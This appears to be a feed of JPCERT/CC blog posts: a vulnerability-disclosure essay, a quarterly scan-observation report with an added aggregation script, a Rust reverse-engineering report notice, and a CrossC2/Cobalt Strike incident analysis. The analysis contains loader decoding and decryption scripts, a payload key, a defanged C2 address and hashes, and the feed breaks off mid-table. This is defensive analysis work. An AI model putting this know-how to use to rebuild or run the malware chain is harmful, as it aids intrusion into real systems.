href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32.png" class="mt-asset-link"><img class="asset asset-image at-xid-3876912 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32-640wri.png" alt="" width="640" height="638"></a> <figcaption>図3_各プレーヤーの開示タイミングのギャップ</figcaption> </figure> <p></p> <p></p> <h4>前編のまとめ:予測可能性を担保する制度</h4> 
<p>That this globally unusual system has operated for more than 20 years without strong obligations or penalties is entirely thanks to the understanding and cooperation of each player in the public and private sectors. Above all, the system works because engineers and researchers understand both the technical nature of vulnerabilities and the on-the-ground realities of how products are provided and used, and because various public institutions and the media understand the advantages of the arrangement.</p> <p>As noted above, overseas there have been many troubles in which vulnerability information was disclosed without reaching agreement with the vendor, and one sees voices defending even somewhat forceful methods on the grounds that "disclosure is desirable from the standpoint of public interest", in an "the end justifies the means" manner. The author believes, however, that such approaches produce long-term disadvantages (for finders as well).</p> <p>When such uncoordinated disclosure takes place, it affects not only the case at hand but also subsequent vulnerability coordination. Vendors come to distrust finders; that makes their responses look unenthusiastic, which in turn makes finders distrust vendors, and the chain of distrust accumulates. The reverse pattern also exists: as cases in which vendors do not respond to finders' reports increase, finders come to feel that "reporting to the vendor only gets the issue buried" and lean toward full disclosure.</p> <p>Laws and rules work because their outcomes are predictable to a certain degree. In the case of the vulnerability-related information handling system, the rules "the finder reports to the reception desk", "no unauthorized leaking to third parties", "the coordinating body steps in to coordinate publication" and "the product developer fixes and publishes the vulnerability" are set out in advance, so the parties' actions are visible (predictable). Furthermore, because the results are made public (vendor announcements, JVN publication, naming of the finder), it can be verified that "the parties acted according to the rules". It is precisely because this predictability is guaranteed that each player can handle vulnerability information, an extremely risky kind of information, in a stable way without falling into mutual suspicion. An "end justifies the means" approach follows rules internal to the individual or organization acting, and has no predictability.</p> <p>Whether the current system is the best one is a separate discussion. Part 2 will introduce the little-known actual operations for handling cases where a vulnerability is exploited, and consider future challenges and issues as seen from the system's operation and from incident response.</p> <h4>References</h4> <p><a name="fn1"></a>[1] Ministry of Economy, Trade and Industry, "Vulnerability-related information handling framework" https://www.meti.go.jp/policy/netsecurity/vulinfo.html<br>Regulations on the handling of vulnerability-related information for software products, etc. https://www.meti.go.jp/policy/netsecurity/vul_notification.pdf<br>Information Security Early Warning Partnership Guidelines https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html<br>Manual for the publication of vulnerability countermeasure information by software product developers https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html#section6</p> <p><a name="fn2"></a>[2] For reviews of improvements to the system as a whole and annual activity reports, see the yearly reports of the study group on the handling of vulnerability information in information systems, etc. https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html</p> <p><a name="fn3"></a>[3] https://www.ipa.go.jp/archive/files/000072543.pdf</p> <p><a name="fn4"></a>[4] On the impact of unintended disclosure of cyberattack damage information on information-sharing activities https://blogs.jpcert.or.jp/ja/2023/12/leaks-and-breaking-trust.html</p> <p><a name="fn5"></a>[5] Takashi Iida, "法と社会科学をつなぐ" (Linking Law and the Social Sciences), Yuhikaku, p. 136</p> <p><a name="fn6"></a>[6] A related point of debate is whether, in cases of exploitation of enterprise-product vulnerabilities, it is right not to publish an alert immediately but to respond essentially privately through individual notifications. On this point, see page 97 of the "Guidance on Sharing and Publishing Information on Cyberattack Damage" https://www.cyber.go.jp/pdf/council/cs/kyogikai/guidance2022_honbun.pdf</p> <p><a name="fn7"></a>[7] Preventing disadvantage to vendors and users is important, but the author also considers finder motivation important for keeping the cycle of vulnerability discovery and remediation healthy.</p>
  44. TSUBAME Report Overflow (April to June 2025)

    Thu, 11 Sep 2025 02:00:00 -0000

    Introduction In this blog, "TSUBAME Report Overflow", every quarter...
    <h3>Introduction</h3> <p>This blog, "TSUBAME Report Overflow", is published alongside the quarterly "<a href="https://www.jpcert.or.jp/tsubame/report/">Internet Fixed-Point Observation Report</a>" and takes up material not written in the report, such as comparisons of observation trends at the sensors installed overseas and other activities.<br>This time we present the observation results of TSUBAME (the Internet fixed-point observation system) for April to June 2025.</p> <h3>Changes in packets originating from Iran, apparently related to the military clash between Israel and Iran</h3> <p>From around June 13 to 25, 2025, there was a military clash between Israel and Iran. Packets observed from Iran changed during the same period, so we take this up here. Figure 1 plots, for June 1 to 30, the daily number of source IP addresses observed from Iran and from Israel.</p> <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png" width="1179" height="577" alt="" class="asset asset-image at-xid-3752125" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">Figure 1: Number of source IP addresses from Israel and from Iran</td> </tr> </tbody> </table> <p>The number of source IP addresses for packets from Iran had hovered around 170 to 200 per day, but it decreased to around 100 to 130 from about June 13 to 18, and then dropped temporarily but sharply to around 20 to 100 from June 19 to 27. By contrast, no major change was seen in the number of source IP addresses from Israel.<br>Some media also reported that from around June 18, state broadcasters, banks and cryptocurrency exchanges in Iran suffered attacks. It was further reported that the Iranian government temporarily restricted Internet connectivity to reduce the damage from cyberattacks, and the decrease in the number of source IP addresses is thought to reflect that network cutoff.</p> <h3>Comparison of domestic and overseas observation trends</h3> <p>Figure 2 compares, month by month, the average number of packets received per sensor per day in Japan and overseas. The overseas sensors observe more packets than the domestic ones. For both domestic and overseas sensors, April had the largest count, and the count has decreased gradually with each passing month.</p> <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png" width="1153" height="573" alt="" class="asset asset-image at-xid-3752127" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">Figure 2: Monthly comparison of the average packet count at domestic and overseas sensors</td> </tr> </tbody> </table> <h3>Comparison of observation trends by sensor</h3> <p>Each sensor is assigned one global IP address. To see whether observations differ among the sensors in Japan, North America, Europe and other regions, Table 1 summarizes the top 10 packets received by each. The order differs from sensor to sensor, but 22/TCP, 23/TCP, 80/TCP, 443/TCP and 8080/TCP were observed at almost all sensors. This suggests that scanning is being conducted across a wide range of networks.</p> <p style="text-align: center;">Table 1: Comparison of the top 10 packets at each domestic and overseas sensor</p> <table> <tbody> <tr><th></th><th>Domestic sensor 1</th><th>Domestic sensor 2</th><th>North America sensor 1</th><th>North America sensor 2</th><th>Europe sensor 1</th><th>Europe sensor 2</th><th>Other-region sensor 1</th><th>Other-region sensor 2</th></tr> <tr><td align="right">1st</td><td>23/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td></tr> <tr><td align="right">2nd</td><td>443/TCP</td><td>8728/TCP</td><td>22/TCP</td><td>ICMP</td><td>443/TCP</td><td>22/TCP</td><td>80/TCP</td><td>80/TCP</td></tr> <tr><td align="right">3rd</td><td>80/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>443/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td></tr> <tr><td align="right">4th</td><td>8443/TCP</td><td>22/TCP</td><td>23/TCP</td><td>23/TCP</td><td>22/TCP</td><td>80/TCP</td><td>22/TCP</td><td>443/TCP</td></tr> <tr><td align="right">5th</td><td>8728/TCP</td><td>ICMP</td><td>443/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>34567/TCP</td><td>443/TCP</td><td>22/TCP</td></tr> <tr><td align="right">6th</td><td>22/TCP</td><td>443/TCP</td><td>8080/TCP</td><td>22/TCP</td><td>445/TCP</td><td>ICMP</td><td>ICMP</td><td>ICMP</td></tr> <tr><td align="right">7th</td><td>ICMP</td><td>81/TCP</td><td>ICMP</td><td>8080/TCP</td><td>ICMP</td><td>443/TCP</td><td>8080/TCP</td><td>8080/TCP</td></tr> <tr><td align="right">8th</td><td>8080/TCP</td><td>8080/TCP</td><td>3389/TCP</td><td>6379/TCP</td><td>8080/TCP</td><td>81/TCP</td><td>81/TCP</td><td>81/TCP</td></tr> <tr><td align="right">9th</td><td>81/TCP</td><td>5555/TCP</td><td>445/TCP</td><td>3389/TCP</td><td>1433/TCP</td><td>8080/TCP</td><td>5555/TCP</td><td>5555/TCP</td></tr> <tr><td align="right">10th</td><td>6379/TCP</td><td>3389/TCP</td><td>81/TCP</td><td>81/TCP</td><td>6379/TCP</td><td>445/TCP</td><td>6379/TCP</td><td>6379/TCP</td></tr> </tbody> </table> <h3>Conclusion</h3> <p>Observing at multiple points makes it possible to judge whether a change is occurring only in a particular network. This quarter did not call for a special extra edition or alert, but the presence of scanners warrants attention. We plan to keep publishing this blog regularly alongside the report, and to issue an extra edition when an unusual change occurs. We also welcome your opinions and feedback: if there are items you would like us to dig into or topics you would like covered, please send them via the contact form. Thank you for reading to the end.</p> <p style="text-align: right">Cyber Metrics Group, Keisuke Kano</p> <p>TSUBAME Report Overflow (April to June 2025)</p>
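As an added example (not TSUBAME's or JPCERT/CC's code), the following Python aggregates constructed sensor records into the daily per-country source-IP counts behind Figure 1, flags a temporary drop like the one seen for Iran, and builds the per-sensor top-N port ranking of Table 1. The record format, sensor names and IP addresses are assumptions made for the demonstration.

```python
"""Aggregations of the kind behind Figure 1 and Table 1 above.

Added example, not TSUBAME's own code. The record format and the
records themselves are constructed for this demonstration; the real
sensors' storage format is not described on the page.
"""
from collections import Counter, defaultdict
from statistics import median

# Constructed records: date, sensor id, source country, source IP,
# protocol, destination port ("-" for ICMP, which has no port).
SAMPLE_LOG = """\
2025-06-12 jp1 IR 203.0.113.10 TCP 23
2025-06-12 jp1 IR 203.0.113.11 TCP 23
2025-06-12 jp1 IR 203.0.113.12 TCP 80
2025-06-12 jp1 IR 203.0.113.12 TCP 80
2025-06-12 na1 IR 203.0.113.13 TCP 22
2025-06-12 jp1 IL 198.51.100.5 TCP 443
2025-06-13 jp1 IR 203.0.113.10 TCP 23
2025-06-13 jp1 IR 203.0.113.11 ICMP -
2025-06-13 na1 IR 203.0.113.12 TCP 8728
2025-06-13 na1 IR 203.0.113.14 TCP 80
2025-06-13 jp1 IL 198.51.100.5 TCP 443
2025-06-19 jp1 IR 203.0.113.10 TCP 8728
2025-06-19 jp1 IL 198.51.100.6 TCP 22
2025-06-19 na1 IL 198.51.100.5 TCP 443
"""


def parse_records(text):
    """Parse whitespace-separated records; blank lines and '#' comments are skipped."""
    records = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        date, sensor, country, src_ip, proto, port = line.split()
        records.append({"date": date, "sensor": sensor, "country": country,
                        "src_ip": src_ip, "proto": proto, "port": port})
    return records


def daily_unique_sources(records, country):
    """Distinct source IPs per day for one source country, across all sensors (Figure 1)."""
    per_day = defaultdict(set)
    for r in records:
        if r["country"] == country:
            per_day[r["date"]].add(r["src_ip"])
    return {day: len(ips) for day, ips in sorted(per_day.items())}


def flag_drops(daily_counts, ratio=0.5):
    """Days whose count falls below `ratio` of the median over the period.

    A simple way to surface a temporary drop like the one the post
    observed for Iran; the median is robust to the drop days themselves."""
    baseline = median(daily_counts.values())
    return [day for day, n in daily_counts.items() if n < ratio * baseline]


def top_ports(records, sensor, n=10):
    """Top-n destination port/protocol labels for one sensor (Table 1).

    ICMP has no port and is labelled "ICMP"; ties are broken by label."""
    counts = Counter()
    for r in records:
        if r["sensor"] != sensor:
            continue
        label = "ICMP" if r["proto"] == "ICMP" else f'{r["port"]}/{r["proto"]}'
        counts[label] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))[:n]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    ir = daily_unique_sources(recs, "IR")
    print("IR sources per day:", ir)
    print("drop days:", flag_drops(ir))
    for sensor in ("jp1", "na1"):
        print(sensor, top_ports(recs, sensor, 3))
```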
  45. Publication of a research report on reverse engineering binaries written in Rust

    Tue, 02 Sep 2025 02:00:00 -0000

    Rust is a language expected to replace C and C++, and its memory safety...
    <p>Rust is a language expected to replace C and C++, and it has attracted attention in recent years for its memory safety and speed. As Rust spreads as a programming language, malware developed in Rust (hereafter "Rust malware"), such as the Rust variant of SysJoker and the BlackCat ransomware, has been increasing in recent years. However, knowledge of reverse engineering techniques for Rust malware is not as mature as that for classic C and C++ malware. JPCERT/CC has therefore today published the "Research Report on Reverse Engineering Binaries Written in Rust", which summarizes the results of our investigation into reverse engineering binaries written in Rust (hereafter "Rust binaries").</p> <p><a href="https://github.com/JPCERTCC/rust-binary-analysis-research-ja">Research Report on Reverse Engineering Binaries Written in Rust</a></p> <p>This post introduces the report.</p> <h3>Contents of the report</h3> <p>The report selects research items concerning the reverse engineering of Rust binaries and summarizes the results of investigating and verifying each. See Appendix A for the detailed list of research items. The versions of the tools used in this research are as follows. Binaries were compiled in a Windows MSVC environment.</p> <pre style="background:#25292f;color: #fff;"><code>cargo: 1.82.0
rustc: 1.82.0
IDA Pro v8.3.230608
</code></pre> <h3>How to use the report</h3> <p>Because each research item in the report is independent, you can refer only to the items of interest rather than reading it through. Some items include sample programs, so we recommend checking the items that interest you, compiling the sample programs yourself, and examining the resulting Rust binaries alongside the report.</p> <h3>Conclusion</h3> <p>Rust is spreading rapidly and is considered relatively difficult to reverse engineer, so its abuse by attackers is expected to increase. We hope this report helps, even a little, with reverse engineering Rust malware. If you find any deficiencies or have comments, please let us know.</p> <p style="text-align: right">Incident Response Group, Tomoya Kamei</p> <h3>Appendix A: Research items</h3> <table> <caption>Table 1: Research items</caption> <thead> <tr> <td style="background-color: #bdbdbd; width: 50px; text-align: center;">No.</td> <td style="background-color: #bdbdbd; width: 350px; text-align: center;">Item</td> <td style="background-color: #bdbdbd; width: 500px; text-align: center;">Summary</td> </tr> </thead> <tbody> <tr> <td>1</td> <td>Binary differences caused by changing Cargo profile settings</td> <td>Investigation of how much the publicly documented binary-size reduction techniques using cargo actually reduce size, and what information remains</td> </tr> <tr> <td>2</td> <td>Binary size reduction</td> <td>Investigation of how much the publicly documented binary-size reduction techniques using rustc actually reduce size, and what information remains</td> </tr> <tr> <td>3</td> <td>Identifying Rust binaries</td> <td>Investigation of methods for determining whether a binary was compiled from Rust</td> </tr> <tr> <td>4</td> <td>Exception Directory</td> <td>Investigation of the information obtainable from the structure of the Exception Directory</td> </tr> <tr> <td>5</td> <td>TLS Directory</td> <td>Investigation of the information obtainable from the TLS Directory structure and the contents of TLS callbacks</td> </tr> <tr> <td>6</td> <td>Locating the main function and initialization</td> <td>How to locate the user-defined main function</td> </tr> <tr> <td>7</td> <td>Strings</td> <td>How strings are handled</td> </tr> <tr> <td>8</td> <td>Function name mangling</td> <td>Structure of mangled function names and how to demangle them</td> </tr> <tr> <td>9</td> <td>Closures</td> <td>Behaviour of closures and the memory layout used</td> </tr> <tr> <td>10</td> <td>Enums</td> <td>Investigation of how the behaviour of Rust enums is implemented in assembly</td> </tr> <tr> <td>11</td> <td>match statements</td> <td>Investigation of how the behaviour of Rust match statements is implemented in assembly</td> </tr> <tr> <td>12</td> <td>Panics</td> <td>Assembly differences between the unwind and abort panic behaviours</td> </tr> <tr> <td>13</td> <td>Iterators</td> <td>Investigation of how code using iterators and the next function is implemented in assembly</td> </tr> <tr> <td>14</td> <td>Traits</td> <td>Differences between calls to functions implementing traits and ordinary function calls</td> </tr> <tr> <td>15</td> <td>Identifying common traits</td> <td>How to identify, in assembly, the traits used with the #[derive] attribute</td> </tr> <tr> <td>16</td> <td>Dynamic dispatch references</td> <td>Assembly characteristics and differences between calls using dynamic and static dispatch</td> </tr> <tr> <td>17</td> <td>Collections</td> <td>Memory layout used</td> </tr> <tr> <td>18</td> <td>Identifying functions generated from the same generic</td> <td>Investigation of methods for identifying the generic function they were generated from</td> </tr> <tr> <td>19</td> <td>Smart pointers</td> <td>Characteristics and memory layout of smart pointers</td> </tr> <tr> <td>20</td> <td>Inline assembly</td> <td>Characteristic code patterns</td> </tr> <tr> <td>21</td> <td>link attribute</td> <td>Differences in how libraries are linked</td> </tr> <tr> <td>22</td> <td>repr attribute</td> <td>Investigation of how the memory layout changes under the available options</td> </tr> <tr> <td>23</td> <td>Distinguishing standard and third-party libraries</td> <td>How to identify statically linked standard-library and third-party library functions</td> </tr> </tbody> </table>
  46. Attacks using "CrossC2", a tool that extends Cobalt Strike Beacon functionality across platforms

    Thu, 14 Aug 2025 05:00:00 -0000

    From September to December 2024, JPCERT/CC confirmed ... running on Linux...
    <p>From September to December 2024, JPCERT/CC confirmed incidents that used CrossC2, an extension tool that can create Cobalt Strike Beacons running on Linux. Besides CrossC2, this attacker used PsExec, Plink and Cobalt Strike in attempts to intrude into AD. We also confirmed that a custom malware (hereafter "ReadNimeLoader") was used as a loader for Cobalt Strike. Judging from VirusTotal submission data, this attack campaign may have been observed in several countries, not only Japan.</p> <p>This post explains the malware confirmed in this campaign, CrossC2 and Cobalt Strike, and the tools the attacker used. Finally, it introduces a tool published by JPCERT/CC that supports the analysis of CrossC2.</p> <h3>CrossC2</h3> <p>CrossC2 is an unofficial Beacon written in C, together with its builder, compatible with Cobalt Strike version 4.1 and later. It is developed to run on Linux (x86, x64) and macOS (x86, x64, M1). The CrossC2 builder is published on GitHub<a href="#1">[1]</a> and can create Beacons, but neither the builder's source code nor the Beacon's source code is public.</p> <p>When executed, CrossC2 immediately forks, and the main processing takes place in the child process. The C2 destination is taken from the config, but the C2 server's host and port can also be taken from the environment variables <strong>"CCHOST"</strong> and <strong>"CCPORT"</strong>. After execution, CrossC2 communicates with the Cobalt Strike TeamServer and can execute various Cobalt Strike commands, although the set of executable commands is smaller than that of the genuine Cobalt Strike. The Beacon implements the following anti-analysis features.</p> <ul> <li>String encoding by single-byte XOR</li> <li>Insertion of large amounts of meaningless code</li> </ul> <p>Figure 1 shows part of the inserted meaningless code. Large amounts of meaningless code are inserted into the main functions, but the obfuscation can easily be removed by replacing the following byte sequence with NOP instructions.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 8B 85 ?? ?? ?? ?? 2D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 
E9 00 00 00 00 </pre> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS01-800wri.png" width="800" height="912" alt="" class="asset asset-image at-xid-3824881 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 1: Part of CrossC2's obfuscated code </div> <p>The config data is stored at the end of the file. CrossC2 obtains its own file path with the readlink function, freads its own code, and searches for the string <strong>"HOOK"</strong> to obtain the address of the config data. The config has the following structure, and the encrypted config data can be decrypted with <strong>AES128-CBC (no padding)</strong>. CrossC2 uses <strong>OpenSSL library</strong> functions for the decryption.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 0x0: "HOOK" search tag
0x4: size of the config data
0x8: encrypted config data </pre> <p>CrossC2 can create Beacons through the extension mechanism of a legitimate TeamServer. Beacons created with the default settings are packed with UPX, but attempting to unpack them with UPX fails. To unpack one, first remove the config information from the end of the file, unpack with UPX, and then append the config information to the end of the unpacked file.</p> <h3>Cobalt Strike</h3> <p>Figure 2 shows the flow up to the execution of Cobalt Strike. The starting point of malware execution is the legitimate file java.exe, run from a scheduled task registered by the attacker. java.exe loads jli.dll, which is ReadNimeLoader, via DLL side-loading. ReadNimeLoader is a loader written in Nim. It reads the data file readme.txt in the same folder, decrypts it and executes it in memory. readme.txt contains OdinLdr<a href="#2">[2]</a>, an open-source shellcode-format loader, and OdinLdr decodes the Cobalt Strike Beacon encoded inside it and executes it in memory. The set of files including ReadNimeLoader was stored under the path <strong>"C:\$recycle.bin\"</strong> on the victim host. We also confirmed that some ReadNimeLoader samples carried the following PDB path.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> D:\BuildServer\bna-4\work-git\phoenix-repository\phoenix\Release\Battle.net Launcher.exe.pdb </pre> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS02-800wri.png" width="800" height="337" alt="" class="asset asset-image at-xid-3824886 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: 
center;"> Figure 2: Flow of operations up to the execution of Cobalt Strike </div> <h4>ReadNimeLoader</h4> <p>ReadNimeLoader has the following four anti-analysis features.</p> <ul> <li>Debugger check via the BeingDebugged value in the PEB</li> <li>Debugger check via the CONTEXT_DEBUG_REGISTER value</li> <li>Debugger check by measuring the elapsed-time difference and testing whether it is 0x512 or more</li> <li>Debugger check by raising an exception and testing whether the exception handler receives it</li> </ul> <p>Part of the key needed to decrypt OdinLdr is stored inside the functions implementing these anti-analysis features; unless those functions are executed, the correct key is not generated and OdinLdr cannot be decrypted. As a further anti-analysis measure, meaningless code is inserted. Part of that code is shown in Figure 3.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS03-640wri.png" width="640" height="629" alt="" class="asset asset-image at-xid-3824887 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 3: Part of the obstructing code </div> <p>The strings used by ReadNimeLoader are encoded, and two characteristic XOR-based decode functions are used. Part of each is shown in Figure 4.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS04-800wri.png" width="800" height="370" alt="" class="asset asset-image at-xid-3824888 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 4: The decode functions </div> <p>The encoded strings can be decoded with the following Python script. Older versions of ReadNimeLoader do not have the decode function corresponding to decode02 in the script; it is thought to have been added in a later version.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
def BYTE1(in_data):
    return (in_data >> 8) & 0xff

def BYTE2(in_data):
    return (in_data >> 16) & 0xff

def BYTE3(in_data):
    return (in_data >> 24) & 0xff

def decode02(enc_bytes, xor_key):
    # newer samples: every byte is XORed with one mask built from all four key bytes
    result = []
    for enc_byte in enc_bytes:
        enc_byte ^= (BYTE3(xor_key) & 0xEE) ^ (BYTE2(xor_key) & 0xEE) ^ ((xor_key ^ BYTE1(xor_key)) & 0xEE)
        result.append(enc_byte)
    return bytes(result)

def decode01(enc_bytes, xor_key):
    # every byte is XORed in turn with the masked low byte of each 8-bit shift of the key
    xor_table = [0, 8, 0x10, 0x18]
    result = []
    for enc_byte in enc_bytes:
        for j in range(4):
            enc_byte ^= ((xor_key >> xor_table[j]) & 0xEE)
        result.append(enc_byte)
    return bytes(result)
</pre> <p>ReadNimeLoader uses <strong>AES256 in ECB mode</strong> to decrypt the malware body. The decryption key is built by concatenating specific strings decoded by the decode functions above into one string, converting it to hexadecimal, upper-casing the resulting string, and zero-padding it. The following Python script can perform the decryption.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
from Crypto.Cipher import AES
import binascii

def ZeroPadding(hexstr, num):
    # pad the hex key with NUL bytes up to num bytes (32 for an AES-256 key)
    padding_num = num - len(hexstr)
    if padding_num < 0:
        return hexstr
    return hexstr + b"\x00" * padding_num

def decrypt(readme_data, key_string):
    # key_string: the decoded strings joined together (see Appendix B)
    capitalized_key = binascii.hexlify(key_string.encode("ascii")).upper()
    key = ZeroPadding(capitalized_key, 32)
    cipher = AES.new(key, AES.MODE_ECB)
    return cipher.decrypt(readme_data)
</pre> <h4>OdinLdr</h4> <p>After execution, OdinLdr decodes the Cobalt Strike Beacon encoded inside it and runs it in memory. At regular intervals it re-encrypts the Beacon in newly allocated heap memory using a randomly generated XOR key, a mechanism presumably used to evade memory scanning. A distinguishing feature is the string <strong>"OdinLdr1337"</strong> at the start of that heap memory. We also confirmed samples in which the shellcode unpacked by ReadNimeLoader executes the Cobalt Strike Beacon directly, as well as ones that go through OdinLdr.</p> <p>Appendix B lists the correspondence between ReadNimeLoader versions, the key used to decode the malware body, the readme.txt loaded, and the encoded malware body. Part of the Cobalt Strike config used is given in Appendix C.</p> <h3>Tools used by the attacker</h3> <p>Among the tools used by the attacker were several ELF versions of SystemBC. For differences from the Windows version of SystemBC and other details, see the report by ANY.RUN<a href="#3">[3]</a>. Other tools confirmed include PsExec, often used for lateral movement, GetNPUsers<a href="#4">[4]</a>, used for AS-REP Roasting attacks, the SSH client Plink, and privilege escalation tools for Windows.</p> <h3>Attribution</h3> <p>The domain used for the confirmed Cobalt Strike C2 is the same as a C2 in the Black Basta article published by Rapid7<a href="#5">[5]</a>; files named jli.dll and readme.txt were used for ReadNimeLoader; and although the target architecture differs, the use of SystemBC and of AS-REP in attacks on AD also match. For these reasons, this attacker and campaign may have some relationship with Black Basta.</p> <h3>CrossC2 analysis tool</h3> <p>As an analysis tool for CrossC2, we have published a config parser on GitHub; please make use of it.</p> <p>GitHub: JPCERTCC/aa-tools/parse_crossc2beacon_config.py <br /> <a 
href="https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py" target="_blank">https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py</a></p> <p>CrossC2 can generate binaries not only for Linux but also for macOS, and this config parser supports the macOS binaries as well. Figure 5 shows an example of the parser's output.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS05-800wri.png" width="800" height="689" alt="" class="asset asset-image at-xid-3824889 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 5: Example run of the config parser </div> <h3>Conclusion</h3> <p>There are many incidents involving Cobalt Strike, but this time we confirmed a case in which CrossC2, a tool that extends Cobalt Strike Beacon functionality across platforms, was used in an attack and a Linux server on the internal network was compromised. Linux servers often have no EDR or similar protection deployed and can become a foothold for expanding the scope of an intrusion, so caution is needed. We hope the information explained here will be useful for incident response and analysis. The C2 destinations and hash values of the confirmed malware are listed in the appendices.</p> <p style="text-align: right">Incident Response Group, Yuma Masubuchi</p> <h4>References</h4> <p><a name="1"></a>[1] CrossC2 <a href="https://github.com/gloxec/CrossC2" target="_blank"><br>https://github.com/gloxec/CrossC2</a></p> <p><a name="2"></a>[2] OdinLdr <a href="https://github.com/emdnaia/OdinLdr" target="_blank"><br>https://github.com/emdnaia/OdinLdr</a></p> <p><a name="3"></a>[3] ANY.RUN<br> A new SystemBC RAT is targeting Linux-based platforms <a href="https://x.com/anyrun_app/status/1884207667058463188" target="_blank"><br>https://x.com/anyrun_app/status/1884207667058463188</a></p> <p><a name="4"></a>[4] GetNPUsers.py <a href="https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py" target="_blank"><br>https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py</a></p> <p><a name="5"></a>[5] Rapid7<br> BlackSuit Continues Social Engineering Attacks in Wake of Black Basta’s Internal Conflict <a href="https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/" target="_blank"><br>https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/</a></p> <h4>Appendix A: Example CrossC2 config</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> C2: 162.33.179[.]247:8443
PUBLICKEY: [RSA public key omitted] </pre> <h4>Appendix B: Correspondence between ReadNimeLoader and the malware body</h4> <p>Table 1: Correspondence between ReadNimeLoader and the malware body</p> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 24%;"> <col style="width: 9%;"> <col style="width: 30%;"> <col style="width: 24%;"> <col style="width: 13%;"> </colgroup> <thead> <tr> <th>ReadNimeLoader Hash(SHA256)</th> <th>Version</th> <th>Key</th> <th>readme.txt Hash(SHA256)</th> <th>Encoded Malware</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("mfzuyqroasv")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td 